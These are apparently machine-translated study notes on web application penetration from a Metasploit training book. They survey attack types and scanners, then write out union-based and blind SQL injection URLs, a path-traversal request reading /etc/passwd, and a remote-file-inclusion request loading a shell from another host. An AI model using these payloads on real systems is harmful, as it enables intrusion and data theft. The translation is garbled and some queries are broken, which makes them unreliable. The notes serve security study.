"Metasploit Penetration test Devil Training Camp" study notes fourth chapter-web application infiltration

Continue to learn Metasploit ... It is important to remember the notes, and the following starts with the text: two. Web application penetration Technology     1.WEB application penetration Basics         first introduces the main types of Web application attacks (approximate, self-check)         SQL injection attacks: broadly divided into general injection and blind         cross-site scripting (XSS): Storage-type XSS, reflective XSS, and Dom-type xss        cross-site pseudo- Create request (CSRF): An XSS injection of a script, when the victim clicks on the script, the script forges the victim to make a request.         session authentication Management flaw: There is a flaw in the ability to verify identity.         security misconfiguration: Errors in development and management personnel lead to vulnerabilities.         Insecure password storage: Passwords are present in plaintext or encryption algorithms are too fragile.         Unsafe object reference: Attackers use the Read function of the web system itself to arbitrarily access documents and steal sensitive files.         Restrict URL access failure: No access to the private page is authenticated.         lack of protection for the Transport layer: no protection mechanisms such as SSL/TLS are set up to steal sensitive data directly from attackers.         unauthenticated redirects and jumps: Attackers can steal victim-sensitive data by tricking the victim through an unauthenticated redirect page.         Metasploit There are fewer modules for penetration attacks on Web applications, but there are many excellent web penetration tools in the Kali infiltration system that make up for Metasploit deficiencies.          1.1METASPLOIT support modules               support modules are all Modules/auxi liary/, and the WMAP Web scanner is built into the latest Metasploit, allowing the user to configure the auxiliary modeblock, a centralized scan of the site.          1.2 penetration modules               Infiltration modules are scattered across multiple folders in the module and are available for mainstream CMS Vulnerabilities, there are modules for a variety of database vulnerabilities, and also contains the Webshell to operate after success.               Metasploit and web vulnerability scanners such as W3af,sqlmap,wxf,xssf,beff have interfaces to better detect. 2.WEB application vulnerability scanning detection        2.1. Open source Web Application Vulnerability Scanning Tool              wapiti: High scan accuracy for SQL injection              W3AF: excellent overall, with high accuracy.              SANDCAT free Edition: High accuracy for XSS cross-site vulnerability        2.2 scan artifact w3af& nbsp           W3AF is divided into eight modules: Discovery Module (find HTTP information, and probe server, database and other information), Audit module (probing vulnerability), search module (capture information), attack module (read scan information, and try to pass the module plug-in attack), output module (output scan results), modify the module (modify information), intrusion module (bypassing intrusion detection system), crack module (Crack need authentication page, support Basic authentication mechanism and form landing mechanism crack)             How to use it is not detailed.        2.3  sql Injection Vulnerability detection              SQLMAP is an excellent scanning tool for SQL injection vulnerabilities. The specific usage is no longer detailed. The Metasploit has been integrated with this tool.       2.4  XSS Vulnerability detection             Xsser,xssfuzz tools, Or use the Metasploit integrated W3AF.        2.5  web Application Vulnerability detection             WXF is the Web vulnerability scanning and attack framework, Use the concept of the Metasploit framework. This tool is not integrated in Kali and needs to be downloaded by itself.   3.WEB application Penetration testing        3.1 SQL injection analysis             Here for a simple explanation, more advanced content from             General injection:            http://www. xxx.net/do/plus/view.php?aid=236896 '             //See if there is an injection, and if ' is filtered, it cannot be judged.              http://www. Xxx.net/do/plus/view.php?aid=236896 and 1=2 Union Select 1,2,3,4,5,6,7-- //is used here--comment the statement behind it to avoid grammatical errors. The statement is used to determine the number of columns, if an error message is returned, the judgment error is proved, continue to add numbers to judge.                http://www. Xxx.net/do/plus/view.php?aid=236896 and 1=2 Union Select 1,version (), database (), user (), 5,,7,8,9,10 from table name--& NBsp;//gets the database version and user name.                http://www. Xxx.net/do/plus/view.php?aid=236896 and 1=2 Union Select 1,version (), database (), user (), 5,,7,8,group_concat ( schema_name), from INFORMATION_SCHEMA. schema--  //Check all tables                 http://www. Xxx.net/do/plus/view.php?aid=236896 and 1=2 Union Select 1,version (), database (), user (), 5,,7,8,group_concat ( table_name), from Information_schema.tables where Table_schema=database ()--  //query all columns in the table                 HTTP://WWW. Xxx.net/do/plus/view.php?aid=236896 and 1=2 Union Select 1,version (), database (), user (), 5,,7,8,group_concat ( column_name), from Information_schema.columns where table_name= column name hex--  //Query column fields                 Blinds: This is a blind note of the character's guess.                  http://www. xxx.net/do/plus/View.php?aid=236896 and Length (Database ()) >1                   http://www. Xxx.net/do/plus/view.php?aid=236896 and Length (Database ()) >2              & nbsp   If the first sentence does not have an error, the second one is an error, then it proves that the database name is two characters. etc...                   http://www. Xxx.net/do/plus/view.php?aid=236896 and ASCII (substring (), ()) >97                     http://www. Xxx.net/do/plus/view.php?aid=236896 and ASCII (substring (), ()) >98                  If the first sentence is not an error, the second one is an error, then it proves that the ASCII code of the first character of the database name is 98, and so on ....                  http://www. Xxx.net/do/plus/view.php?aid=236896 and (SELECT COUNT (table_name) from INFORMATION_SCHEMA where table_schema= Database ()) >15                  This is the number of database tables                   The next is the same, not many.           3.2 cross-site attack case analysis                 Step-by-Step Scripting Attack Framework (XSSF), specific tutorials from Row queries.           3.3 Command injection case analysis                 General process is a vulnerability that is scanned into an application or plugin After going to the internet to find out about the exploit code to penetrate the Webshell, if the ability is superb, you can write your own code or use the code to convert themselves into Metasploit exploit module and payload module. Specific self-practice, my ability is limited ... The future level will come out tutorial ...           3.4 file inclusion and file Upload vulnerability               file contains include local file contains (LFI) and remote file contains (RFI).               http://www. XXX.COM/?PAGE=././././ETC/PASSWD   //use "./" to exit the current directory, try a few more times                http://www. xxx.com/?page=www.ooo.com/shell.php    //shell.php is a pre-prepared shell on a remote host.               File Upload vulnerability is due to the fact that the site has not been rigorously inspected and filtered to submit malicious files for Webshell.         about bypassing uploads, please inquire for yourself.

Metasploit penetration Test Devil Training Camp Study Notes chapter fourth-web application penetration